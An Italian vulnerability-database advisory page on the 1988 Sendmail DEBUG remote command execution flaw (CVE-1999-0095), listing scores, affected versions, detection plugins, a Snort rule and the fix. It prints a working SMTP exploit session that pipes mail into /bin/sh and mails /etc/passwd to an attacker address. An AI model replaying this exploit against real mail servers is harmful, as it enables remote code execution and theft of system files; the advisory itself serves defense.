CVSS Punteggio Meta Temp | Exploit Prezzo Attuale (≈) | Punteggio di interesse CTI |
---|---|---|
9.4 | $0-$5k | 0.00 |
Una vulnerabilità di livello estremamente critico è stata rilevata in Berkeley Sendmail fino 5.58 (Mail Server Software). É interessato una funzione sconosciuta del componente DEBUG Handler. Attraverso la manipolazione di un input sconosciuto se causa una vulnerabilità di classe escalazione di privilegi. Gli effetti sono noti per riservatezza, integrità e disponibilità.
La vulnerabilità è stata pubblicata in data 07/11/1988 con identificazione CA-1988-01 con un advisory (CERT.org) (confermato). L'advisory è scaricabile da cert.org. Questa vulnerabilità è identificata come CVE-1999-0095. L'attacco può avvenire nella rete. L'utilizzo non richiede alcuna forma di autentificazione. Non sono conosciuti dettagli tecnici ma un pubblico metodo di utilizzo è disponibile. La vulnerabilità risulta storicamente interessante per come è stata sviluppata.
Un metodo di utilizzo è stato sviluppato in SMTP ed è stata pubblicata già prima e non dopo il comunicato. L'exploit è scaricabile da exploit-db.com. È stato dichiarato come altamente funzionale. Per almeno 61 giorni, questa vulnerabilità è stata classificata come 0-day exploit. È disponibile un plugin per lo scanner Nessus, numero ID 10247 (Sendmail DEBUG/WIZ Remote Command Execution), che può aiutare a determinare l'esistenza della criticità nel sistema analizzato. Il codice utilizzato dal exploit è:
220 mail.victim.com SMTP helo attacker.com 250 Hello attacker.com, pleased to meet you. debug 200 OK mail from: </dev/null> 250 OK rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0"> 250 OK data 354 Start mail input; end with <CRLF>.<CRLF> mail evil@attacker.com </etc/passwd . 250 OK quit 221 mail.victim.com Terminating
L'aggiornamento alla versione 5.59 elimina questa vulnerabilità. È possibile attenuare l'effetto del problema mediante l'utilizzo Disable Debug
. Il miglior modo suggerito per attenuare il problema è aggiornamento all'ultima versione.
La vulnerabilità è documentata anche nel database X-Force (125), Tenable (10247) e Exploit-DB (19028).
Prodotto
Genere
Fornitore
Nome
Versione
- 5.0
- 5.1
- 5.2
- 5.3
- 5.4
- 5.5
- 5.6
- 5.7
- 5.8
- 5.9
- 5.10
- 5.11
- 5.12
- 5.13
- 5.14
- 5.15
- 5.16
- 5.17
- 5.18
- 5.19
- 5.20
- 5.21
- 5.22
- 5.23
- 5.24
- 5.25
- 5.26
- 5.27
- 5.28
- 5.29
- 5.30
- 5.31
- 5.32
- 5.33
- 5.34
- 5.35
- 5.36
- 5.37
- 5.38
- 5.39
- 5.40
- 5.41
- 5.42
- 5.43
- 5.44
- 5.45
- 5.46
- 5.47
- 5.48
- 5.49
- 5.50
- 5.51
- 5.52
- 5.53
- 5.54
- 5.55
- 5.56
- 5.57
- 5.58
Licenza
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍
CVSSv3
VulDB Punteggio meta-base: 9.8VulDB Punteggio Meta Temp: 9.4
VulDB Punteggio di base: 9.8
VulDB Punteggio temporaneo: 9.4
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vettore | Complessità | Autenticazione | Riservatezza | Integrità | Disponibilità |
---|---|---|---|---|---|
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍
NVD Punteggio di base: 🔍
Exploiting
Classe: Escalazione di privilegiCWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Locale: No
Remoto: Si
Disponibilità: 🔍
Accesso: Pubblico
Stato: Altamente funzionale
Linguaggio Di Programmazione: 🔍
Scaricamento: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Previsione dei prezzi: 🔍
Preventivo attuale: 🔍
0-Day | sbloccare | sbloccare | sbloccare | sbloccare |
---|---|---|---|---|
Oggi | sbloccare | sbloccare | sbloccare | sbloccare |
Nessus ID: 10247
Nessus Nome: Sendmail DEBUG/WIZ Remote Command Execution
Nessus File: 🔍
Nessus Rischio: 🔍
Nessus Family: 🔍
Nessus Context: 🔍
OpenVAS ID: 10247
OpenVAS Nome: Sendmail DEBUG
OpenVAS File: 🔍
OpenVAS Family: 🔍
Exploit-DB: 🔍
Intelligence Sulle Minacce
Interesse: 🔍Attori Attivi: 🔍
Gruppi APT attivi: 🔍
Contromisure
Raccomandazione: UpgradeStato: 🔍
0 giorni di tempo: 🔍
Upgrade: Sendmail 5.59
Config: Disable Debug
Snort ID: 663
Snort Message: SERVER-MAIL Sendmail rcpt to command attempt
Snort Classe: 🔍
SourceFire IPS: 🔍
ISS Proventia IPS: 🔍
Sequenza temporale
01/08/1988 🔍01/08/1988 🔍
01/10/1988 🔍
01/10/1988 🔍
07/11/1988 🔍
22/08/1999 🔍
12/09/2002 🔍
23/10/2002 🔍
16/06/2014 🔍
07/05/2019 🔍
Fonti
Advisory: CA-1988-01Stato: Confermato
CVE: CVE-1999-0095 (🔍)
X-Force: 125
Vulnerability Center: 209 - SendMail Debug Allows Command Execution, High
SecurityFocus: 1 - Berkeley Sendmail DEBUG Vulnerability
OSVDB: 195 - Sendmail debug Arbitrary Command Execution
scip Labs: https://www.scip.ch/en/?labs.20161013
Vedi anche: 🔍
Voce
Data di creazione: 16/06/2014 14:34Aggiornamenti: 07/05/2019 10:51
I cambiamenti: 16/06/2014 14:34 (82), 07/05/2019 10:51 (9)
Completa: 🔍
Cache ID: 3:903:103
Ancora nessun commento. Le Lingue: it + en.
Effettua il login per commentare.